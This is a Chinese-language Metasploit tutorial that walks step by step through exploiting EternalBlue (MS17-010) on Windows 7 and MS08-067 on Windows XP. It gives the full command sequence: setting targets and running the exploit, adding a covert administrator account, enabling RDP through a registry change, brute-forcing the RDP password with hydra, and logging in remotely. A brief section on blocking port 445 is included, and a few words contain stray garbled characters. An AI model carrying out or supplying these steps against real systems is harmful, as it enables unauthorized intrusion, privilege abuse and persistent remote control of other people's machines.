1、一些常用指令msfconsole 打开控制台终端msfupdate 更新help [command] e.g. help search 命令使用帮助信息search […] e.g. search portscanuse … 选择渗透攻击模块
2、show payloads 查看与该攻击模块相兼容的攻击载荷set payload … 设置攻击载荷set target 设置目标show options 查看需要设置的配置参数exploit 实施渗透攻击metasploit渗透攻击模块在目录/usr/share/metasploit-framework/modules/exploitsnmap <扫描选项><扫描目标>
3、攻击实例1、利用永恒之蓝(ms17_010)漏洞攻击win7打开metasploitmsfconsole使用永恒之蓝模块search ms17-01use exploit/windows/smb/ms17_010_eternalblue
4、填充各种指令,主要是靶机IP,其中445端口已经默认了,其他不用改show optionsset RHOST 192.168.12.1攻击exploit或者run创建新用户,偷偷的控制使用net user admin 123456 /add提权,将新创建的用户admin提到管理员权限net localgroup administrators admin /add查看权限:net user admin
5、防御办法:1,网上下载补丁,2,关闭445端口,dos命令:netsh advfirewall firewall add rule name=”deny445” dir=in protocol=tcp localport=445 action=blocknetsh firewall set portopening protocol=tcp port=445 mode=disable name=deny445检测445端口是否开启:netstat -ano -p tcp | find “445”
6、利用Windows Server服务RPC请求缓冲区溢出漏洞(ms_08067)入侵WinXP在msfconsole使用search命令搜索MS08067漏洞攻击程序使用us髫潋啜缅e命令调用MS08067漏洞攻击程序use exploit/windows/smb/ms08_067_netapi使用show options 命令查看需要设置的选项可以看到还需设置RHOST(目标地址)、Exploit target(攻击目标)使用 set 命令设置 Module Options,此处需要设置目标IP
7、接着设置Exploit target,使用show targets 查看可选项可以看出哪些版本的系统存在此漏洞,攻击的XP系统为WinXP SP3 简体中文版,即使用set target 命令设置目标,此处即为set target 34此时再用show options 可以看到全部设置完成,接着使用exploit 或者 run 进行攻击,执行exploit命令后得到一个meterpreter在meterpreter中输入shell即可进入CMD窗口可以进行一些攻击,如远程桌面控制:
8、—-打开RDP服务REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Ser即枢潋雳ver /v fDenyTSConnections /t REG_DWORD /d 00000000 /f—-使用netstat -an命令查看端口是否开放—-接着使用net user命令查看XP系统中的用户net user—-然后针对指定用户比如sysorem用户进行登录密码爆破hydra 172.16.211.129 rdp -l sysorem -P Desktop/pass.txt—-使用hydra爆破密码得:12345接着就能直接登录XP进行远程控制rdesktop -a 32 -u sysorem -p 12345 172.16.211.129:3389—-完成远程控制